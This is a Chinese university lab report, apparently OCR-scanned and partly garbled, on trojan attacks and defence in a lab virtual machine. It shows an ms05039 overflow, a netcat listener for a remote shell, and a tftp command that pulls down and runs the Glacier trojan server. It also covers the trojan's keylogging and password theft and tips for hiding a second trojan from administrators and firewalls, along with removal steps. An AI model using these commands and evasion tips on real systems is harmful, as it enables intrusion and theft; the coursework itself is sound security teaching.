2023年计算机网络安全实验报告

《计算机网络安全》实验报告

实验序号：7实验项目名称：木马袭击与防范实验

学号姓名专业、班

实验地点实1-411指导教师实验时间2023-11-22

一、实验目的及规定

理解和掌握木马传播和运营的机制，掌握检查和删除木马的技巧，学会防御木

马的相关知识，加深对木马的安全防范意识。

二、实验设备（环境）及规定

Windows2023server,虚拟机

三、实验内容与环节

实验任务一：“冰河”木马

本实验需要把真实主机作为袭击机，虚拟机作为靶机。即一方面运用ms05039

溢出工具入侵虚拟机，然后运用“冰河”木马实现对虚拟机的完全控制。最后对木

马进行查杀。

实验任务二：“广外男生”木马

本实验将真实机作为袭击机，虚拟机作为靶机。真实机运用“广外男生”木马

对虚拟机进行袭击，最终完全取得虚拟机的控制权。最后学习木马的查杀。

四、实验结果与数据解决

实验任务一：“冰河”木马

环节1：入侵准备工作

1）下载和安装木马软件前，关闭杀毒软件的自动防护功能,避免程序会被当作

病毒而强行终止。

2）运营G_CLIENT.EXE;

3）选择菜单“设立”->“配置服务程序”;

4）设立访问口令为“1234567”，其它为默认值，点击“拟定”生成木马的

服务端程序G_SERVER.EXEo

5）将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻

防\tftp32。

•Ftftp

文件（E）编辑®查看出收藏®工具①帮助的

jJ后退▼.•国|汽搜索书文件夹恭历史|弗喀

地址②|2Jtftp

白；」口口、

G_SERVER^Tftpd321

tftp

选定项目可以查看其说明。

另话参阅：

我的文档

网上邻居

我的电脑

6）运营tftpd32.exe。保持此程序一直启动，用于等待袭击成功后传输木马

服务程序。

"-Tftpd32byPh.Jounin-iDlxl

当前目录|C:\tftp浏览|

环节2：进行袭击，将木马放置在被袭击端

1）对靶机P3进行袭击,一方面运营

nc-vv-1-p99

接着再开一个dos窗口，运营

ms05039192.168.20.23192.168.20.1991

2）袭击成功后，在运营nc-vv-1-p99的dos窗口中出现提醒，若袭

击不成功请参照“缓冲区溢出袭击与防范实验”，再次进行袭击。

3）在此窗口中运营

tftp-i192.168.20.1getgserver.exe

将木马服务程序G_server.exe上传到靶机P3上,并直接输入g_serv

er.exe使之运营。

:\¥INDO¥S\syste>32\cxi.exe-nc-w-1-p99

：\DocumentsandSettings\babie.lu>cdC：\^fongfang

C：Xgongfang>nc—uu—1—p99

listeningon[any]99...

connectfromCOMMONOR-766C90[192.168.3.150]1032

Microsoftl/indows2000[Uersion5.00.2195]

<C>1985-2000MicrosoftCorp.

C：\WINNT\systen32>tftp—i192.168.3.163getG_Server.exe

C：\gongfang>nc—uu—1—p99

listeningon(anyJ99...

connectfromCOMMONOR-766C90[192.168.3.150]1035

MicrosoftWindows2000CUersion5.00.2195J

<C>1985-2000MicrosoftCorp.

C：\WINNT\systen32>tftp—i192.168.3.163getG_Seruer.exe

tftp-i192.168.3.163getG_Seruer.exe

Transfersuccessful：266386bytesin1second,266386bytes/s

C：\WINNT\systen32>G_Seruer.exe

G_Seruer.exe

C：\WINNT\systen32>

确软济普译:______

环节3：运营木马客户程序控制远程主机

1）打开程序端程序,单击快捷工具栏中的“添加主机”按扭，如图8所示。

/“显示名称”：填入显示在主界面的名称“target”

/“主机地址”：填入服务器端主机的IP地址“192.168.20.23”。

/“访问口令”：填入每次访问主机的密码，这里输入“1234567”。

/“监听端口”：“冰河”默认的监听端口是7626,控制端可以修改它以

绕过防火墙。

单击“拟定”按扭,即可以看到主机面上添加了主机。

+我的电脑文件名称文件大小序节)最后更新时间

口

□target

口

口C：

+IDocumentsand:口

(£Inetpub口

:+\~~lProgramFiles口

田口RECYCLER口

®口Viplnfo口

i+LJWINDOWS口

+SQE3E3口

MD：口

ME：口

0F:口

口

口

口

这时我们就可以像操作自己的电脑同样操作远程目的电脑，比如打开

C:\WINNT\system32\config目录可以找到对方主机上保存用户口令的SAM文

献。点击鼠标右键，可以发现有上传和下载功能。即可以随意将虚拟机器上的机密

文献下载到本机上,也可以把恶意文献上传到该虚拟机上并运营。可见,其破坏性是

巨大的。

2)“文献管理器”使用。点击各个驱动器或者文献夹前面的展开符号,可以浏

览目的主机内容。

然后选中文献，在右键菜单中选中“下载文献至，在弹出的对话框中选

好本地存储途径，点击“保存”。

2”'命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面,

验证控制的各种命令。

a.口令类命令：展开“口令类命令”，

a.1"系统信息及口令”可以查看远程主机的系统信息，开机口令，缓存口令

等。

a.2“历史口令”可以查看远程主机以往使用的口令。

a.3“击键记录”可以记录远程主机用户击键记录，以次可以分析出远程主机

的各种帐号和口令或各种秘密信息。

b.控制类命令：展开“控制类命令”，

b.1"捕获屏幕”可以使控制端使用者查看远程主机的屏幕。

b.2“发送信息”可以向远程计算机发送Windows标准的各种信息。

b.3“进程管理”可以使控制者查看远程主机上所有的进程。单击“查看进

程”按钮，就可以看到远程主机上存在的进程,甚至还可以终止某个进程，只要选中

相应的进程，然后单击“终止进程”就可以了。

b.4“窗口管理”可以使远程主机上的窗口进行刷新，最大化，最小化，激活，隐

藏等。

b.5“系统管理”可以使远程主机进行关机，重启，重新加载“冰河”，自动

卸载“冰河”的操作。

b.6“鼠标控制”可以使远程主机上的鼠标锁定在某个范围内。

b.7“其他控制”可以使远程主机上进行自动拨号严禁，桌面隐藏，注册表锁定

等操作。

c网络类命令展开“网络类命令”，

c.1“创建共享”在远程主机上创建自己的共享。

c.2“删除共享”在远程主机上删除某个特定的共享。

c.3“网络信息”可以看到远程主机上的IPC$,C$,ADMIN$等共享。

d文献类命令：展开“文献类命令"，"文献浏览”，“文献查找”，“文献压缩”，

“文献删除”，“文献打开”等。

e注册表读写：展开“注册表读写”

f设立类命令：展开“设立类命令”

环节4：删除“冰河”木马

删除“冰河”木马的方法：

A.客户端的自动卸载功能，在“控制命令类”中的“系统控制”里面就有自动

卸载功能，执行这个功能，远程主机上的木马就自动卸载了。

B.手动卸载,查看注册表，打开windows注册编辑器。

令打开

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curre

ntVersion\Run

如图16。在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.e

xe,这就是“冰河”木马在注册表中加入的键值，将它删除。

。打开

HKEY_L0CAL_MACHINE\SOFTWARE\Microsoft\Windows

\CurrentVesion\Runse

rviceso在目录中也发现了一个默认的键值C：\WINNT\System32\kerne

132.exe,这也是“冰河”在注册表中加入的键值，将它删除。上面两个注册表的

子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般

病毒程序，木马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目

录下的程序。

令然后再进入C:\WINNT\System32目录，找到“冰河”的两个可执行

文献Kernel32.exe和Sysexplr.exe文献,将它们删除。

|£1system32—!□Ix|

文件⑹编辑()查看⑦收藏工具帮助

£®(D®■

J后退回|◎搜索召文件夹◎1右3X英1理，

地址（3|L-Jsystem32二］夕转到

文件夹X国es.dllscesrv.dllSias

白日本地磁盘(C:)士到mpg4ds32.ax国msvcrt20.dll囹od

回同

EQjDocumentsandSettirrasmontr.dllh323.tspMqd

回wow32.dll国webcheck.dllSpe

ECJProgramFiles

回回回

自UiWINNTCOMDLG32,DLLmsh263.drvMF

；；回msjtes40,dll回mstext40.dll同h2

addins

回cscui.dll回WINSRV.DLL目vcl

AppPatch

|b|qmgr.dll叵]

EC_]assemblyLOCALSPL.DLLW]pn

国MSFLXGRD.OCX|«1sortkey,nls叵]mv

1-lConfig

;iQicm32.dll回QTPlugin.ocx

_]ConnectionWizar|V|sm

国localsec.dll回MSDATGRD.OCX

「1Cursors同W】

国strmdll.dll国Px

国UlDebug闿dxmrtp.dll

国msiehp.dll回ms

@DownloadedInst<

国inetcfq.dllne

由CZlDriverCache▼回MSRD2X35,DLL回ddraw.dllVIVIT

历

1>1J2J

选定2个对象520KB@我的电脑

修改文献关联也是木马常用的手段，“冰河”将txt文献的缺省打开方式由notepad.

exe改为木马的启动程序，除此之外，html,exe,zip,com等都是木马的目的。

所以，最后还需要恢复注册表中的txt文献关联功能，只要将注册表中的

HKEY_CLASSES_ROOT\txtfile\shell\open\command

下的默认值,改为

C:\Windows\notpad.exe%1，即可。

这样，再次重启计算机我们就完全删除了“冰河”木马。

C.杀毒软件查杀

大部分杀毒软件都有查杀木马的功能，可以通过这个功能对主机进行全面扫

描来去除木马,就彻底把木马文献删除了。

实验任务二：“广外男生”木马

1）“广外男生”的连接

运营gwboy.exe,打开“广外男生”的主程序，主界面。

文…I

进日与胆翱

iX4V«dn

E

O

O

Z

h

o

H

M

U

进行客户端设立。依次单击“设立”-“客户端设立”，弹出客户端设立界面如图21。

我们可以看到它采用“反弹窗口+线程插入技术”的提醒。在“客户端最大连接数”

中填入允许多少台客户端主机来控制服务器端，注意不要太多，否则容易导致服务

器端主机死机。在“客户端使用端口”填入服务器端连接到客户端的那个端口，这

是迷惑远程服务器端主机管理员和防火墙的关键，填入一些常用端口，会使远程主

机管理员和防火墙误认为连接的是个合法的程序。比如使用端口80（此例中，为

避免端口冲突，我们使用1500端口）。选择“只允许以上地址连接”选项，使客户

端主机IP地址处在默认的合法控制IP地址池中。

（2）设立木马的连接类型，假如使用反弹端口方式二则在弹出对话框中选中

“使用HTTP网页IP告知”；假如使用反弹端口方式一，则选择“客户处在静态

IP（固定IP地址）此处我们选择后者。单击“下一步”，和“完毕”，结束客户端

设立。

（4）进行服务器端设立。依次单击“设立”-“生成服务器端”，这时弹出“广

外男生”服务器端生成向导，直接单击“下一步”，弹出常规设立界面。

在“EXE文献名”和“DLL文献名”中填入加载到远程主机系统目录下的可

执行文献和动态链接库文献，在“注册表项目”中填入加载到远程主机注册表中的

Run目录下的键值名。这些文献名都是相称重要的，由于这是迷惑远程主机管理员

的关键所在，假如文献名起的非常隐蔽，如sysremote.exe,sysremote.dl

1,那么就算管理员发现了这些文献也不愿定这些文献就是木马而容易删除。注意：

把“服务器端运营时显示运营标志并允许对方退出”前面的对勾去掉，否则服务器

端主机的管理员就可以容易发现自己被控制了。

(5)进行网络设立，如图24选择“静态IP”，在“客户端IP地址”中填入入

侵者的静态IP地址(即真实机IP),“客户